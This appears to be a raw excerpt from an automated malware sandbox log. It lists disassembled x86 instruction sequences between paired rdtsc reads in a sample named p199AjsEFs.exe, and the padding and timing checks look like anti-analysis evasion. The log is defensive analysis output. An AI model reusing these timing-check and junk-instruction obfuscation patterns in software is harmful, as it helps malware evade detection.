Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BF07DE second address: BF07E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BF093F second address: BF0965 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3F4E971A8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c pop edx 0x0000000d popad 0x0000000e push esi 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BF0965 second address: BF0969 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BF8BD9 second address: BF8C0E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007FA3F4E971A3h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c pushad 0x0000000d popad 0x0000000e pop esi 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FA3F4E971A6h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BF8C0E second address: BF8C4B instructions: 0x00000000 rdtsc 0x00000002 je 00007FA3F4513F26h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d jmp 00007FA3F4513F33h 0x00000012 pop ebx 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FA3F4513F39h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BF8C4B second address: BF8C68 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA3F4E971A9h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BF8C68 second address: BF8C6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BF87D0 second address: BF87D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BF87D4 second address: BF87DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BF87DA second address: BF87F1 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FA3F4E971A1h 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BF87F1 second address: BF87F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: C056BC second address: C056C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FA3F4E97196h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: C056C6 second address: C056D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: C11CE9 second address: C11CFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA3F4E971A1h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: C11CFE second address: C11D08 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: C11D08 second address: C11D19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA3F4E9719Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: C11D19 second address: C11D34 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FA3F4513F26h 0x00000008 jo 00007FA3F4513F26h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 jne 00007FA3F4513F26h 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: C105DC second address: C105EB instructions: 0x00000000 rdtsc 0x00000002 ja 00007FA3F4E97196h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b push ebx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: C105EB second address: C105F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: C105F1 second address: C10600 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jng 00007FA3F4E9719Eh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: C10E18 second address: C10E1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: C10E1C second address: C10E2B instructions: 0x00000000 rdtsc 0x00000002 jng 00007FA3F4E97196h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: C10E2B second address: C10E41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007FA3F4513F2Ch 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: C10E41 second address: C10E5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA3F4E971A6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: C10E5D second address: C10E67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: C17F76 second address: C17F7A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: C17F7A second address: C17F86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: C17F86 second address: C17F8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: C17F8A second address: C17F92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: C17F92 second address: C17FA0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA3F4E9719Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: C17FA0 second address: C17FCE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3F4513F38h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FA3F4513F2Eh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: C20263 second address: C20269 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: C20269 second address: C20290 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 js 00007FA3F4513F28h 0x0000000d push edi 0x0000000e pop edi 0x0000000f popad 0x00000010 push esi 0x00000011 jmp 00007FA3F4513F33h 0x00000016 push edi 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: C33267 second address: C3327E instructions: 0x00000000 rdtsc 0x00000002 ja 00007FA3F4E97198h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b jl 00007FA3F4E9719Eh 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: C3327E second address: C33286 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: C33286 second address: C3328C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: C3328C second address: C33290 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: C3672E second address: C36747 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FA3F4E971A3h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: C36747 second address: C3675B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FA3F4513F2Ch 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: C3675B second address: C3675F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: C4C982 second address: C4C9A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FA3F4513F26h 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007FA3F4513F35h 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: C4C9A4 second address: C4C9FD instructions: 0x00000000 rdtsc 0x00000002 jc 00007FA3F4E971AEh 0x00000008 jno 00007FA3F4E97196h 0x0000000e jmp 00007FA3F4E971A2h 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 js 00007FA3F4E971AEh 0x0000001d pushad 0x0000001e popad 0x0000001f jmp 00007FA3F4E971A6h 0x00000024 push edx 0x00000025 jmp 00007FA3F4E971A5h 0x0000002a pop edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: C4C9FD second address: C4CA15 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA3F4513F2Dh 0x00000008 jne 00007FA3F4513F26h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: C4BC26 second address: C4BC31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FA3F4E97196h 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: C4BC31 second address: C4BC37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: C4BC37 second address: C4BC41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FA3F4E97196h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: C4BD77 second address: C4BD7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: C4BD7B second address: C4BD7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: C4BD7F second address: C4BD8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: C50C7A second address: C50C7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: C50CFA second address: C50CFE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: C50CFE second address: C50D0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: C50D0B second address: C50D0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: C50D0F second address: C50D18 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: C50F61 second address: C50F65 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: C50F65 second address: C50F6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: C50F6B second address: C50F70 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B6C7A3 second address: B6C7C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jmp 00007FA3F4E971A0h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 pushad 0x00000012 popad 0x00000013 pop esi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B6CA24 second address: B6CA28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B6CA28 second address: B6CA2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B6CBC1 second address: B6CBC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B6CBC5 second address: B6CBC9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B6CBC9 second address: B6CBDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b jnc 00007FA3F4513F26h 0x00000011 pop edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4CB0740 second address: 4CB0755 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA3F4E971A1h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4CB0755 second address: 4CB077C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3F4513F31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FA3F4513F2Dh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4CB077C second address: 4CB07C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3F4E971A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push ecx 0x0000000e pop edx 0x0000000f pushfd 0x00000010 jmp 00007FA3F4E971A6h 0x00000015 adc si, 4538h 0x0000001a jmp 00007FA3F4E9719Bh 0x0000001f popfd 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4CB07C0 second address: 4CB084C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FA3F4513F2Fh 0x00000009 adc esi, 78DFAAFEh 0x0000000f jmp 00007FA3F4513F39h 0x00000014 popfd 0x00000015 mov ch, 6Bh 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, ecx 0x0000001b jmp 00007FA3F4513F33h 0x00000020 xchg eax, esi 0x00000021 pushad 0x00000022 mov edi, eax 0x00000024 pushad 0x00000025 pushad 0x00000026 popad 0x00000027 call 00007FA3F4513F2Ch 0x0000002c pop esi 0x0000002d popad 0x0000002e popad 0x0000002f push eax 0x00000030 jmp 00007FA3F4513F30h 0x00000035 xchg eax, esi 0x00000036 jmp 00007FA3F4513F30h 0x0000003b lea eax, dword ptr [ebp-04h] 0x0000003e push eax 0x0000003f push edx 0x00000040 pushad 0x00000041 push eax 0x00000042 push edx 0x00000043 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4CB084C second address: 4CB0865 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007FA3F4E971A3h 0x00000009 pop ecx 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4CB0865 second address: 4CB0886 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop edx 0x00000005 jmp 00007FA3F4513F30h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d nop 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 mov esi, 0E27C463h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4CB0886 second address: 4CB08D8 instructions: 0x00000000 rdtsc 0x00000002 mov ax, 43BFh 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushfd 0x00000009 jmp 00007FA3F4E971A4h 0x0000000e and esi, 4D82AAA8h 0x00000014 jmp 00007FA3F4E9719Bh 0x00000019 popfd 0x0000001a popad 0x0000001b push eax 0x0000001c pushad 0x0000001d push ebx 0x0000001e pop ebx 0x0000001f push eax 0x00000020 push edx 0x00000021 pushfd 0x00000022 jmp 00007FA3F4E9719Ch 0x00000027 add ch, 00000008h 0x0000002a jmp 00007FA3F4E9719Bh 0x0000002f popfd 0x00000030 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4CB08D8 second address: 4CB08F8 instructions: 0x00000000 rdtsc 0x00000002 mov ebx, esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 pushad 0x00000009 mov bx, si 0x0000000c jmp 00007FA3F4513F2Ch 0x00000011 popad 0x00000012 push dword ptr [ebp+08h] 0x00000015 pushad 0x00000016 push esi 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4CB099D second address: 4CB09A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4CB09A2 second address: 4CA005F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov cl, dh 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a jmp 00007FA3F4513F2Ch 0x0000000f leave 0x00000010 pushad 0x00000011 mov edx, ecx 0x00000013 mov ecx, 628D8989h 0x00000018 popad 0x00000019 retn 0004h 0x0000001c nop 0x0000001d sub esp, 04h 0x00000020 xor ebx, ebx 0x00000022 cmp eax, 00000000h 0x00000025 je 00007FA3F4514083h 0x0000002b mov dword ptr [esp], 0000000Dh 0x00000032 call 00007FA3F881BB41h 0x00000037 mov edi, edi 0x00000039 jmp 00007FA3F4513F2Eh 0x0000003e xchg eax, ebp 0x0000003f push eax 0x00000040 push edx 0x00000041 pushad 0x00000042 pushfd 0x00000043 jmp 00007FA3F4513F2Dh 0x00000048 sub al, 00000066h 0x0000004b jmp 00007FA3F4513F31h 0x00000050 popfd 0x00000051 pushfd 0x00000052 jmp 00007FA3F4513F30h 0x00000057 jmp 00007FA3F4513F35h 0x0000005c popfd 0x0000005d popad 0x0000005e rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4CA005F second address: 4CA007A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3F4E971A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov dl, 84h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4CA007A second address: 4CA00A1 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebp 0x00000008 pushad 0x00000009 mov cx, dx 0x0000000c call 00007FA3F4513F39h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4CA00A1 second address: 4CA00EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 mov ebp, esp 0x00000008 pushad 0x00000009 push edx 0x0000000a mov di, si 0x0000000d pop eax 0x0000000e pushfd 0x0000000f jmp 00007FA3F4E9719Bh 0x00000014 xor ecx, 676C14BEh 0x0000001a jmp 00007FA3F4E971A9h 0x0000001f popfd 0x00000020 popad 0x00000021 sub esp, 2Ch 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007FA3F4E9719Dh 0x0000002b rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4CA00EE second address: 4CA0149 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FA3F4513F37h 0x00000009 xor cx, AF7Eh 0x0000000e jmp 00007FA3F4513F39h 0x00000013 popfd 0x00000014 mov edi, esi 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 xchg eax, ebx 0x0000001a jmp 00007FA3F4513F2Ah 0x0000001f push eax 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007FA3F4513F2Eh 0x00000027 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4CA0149 second address: 4CA014E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4CA014E second address: 4CA0154 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4CA01E3 second address: 4CA01F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA3F4E971A1h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4CA01F8 second address: 4CA01FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4CA01FC second address: 4CA0224 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebx, 00000000h 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FA3F4E971A9h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4CA0224 second address: 4CA022A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4CA022A second address: 4CA022E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
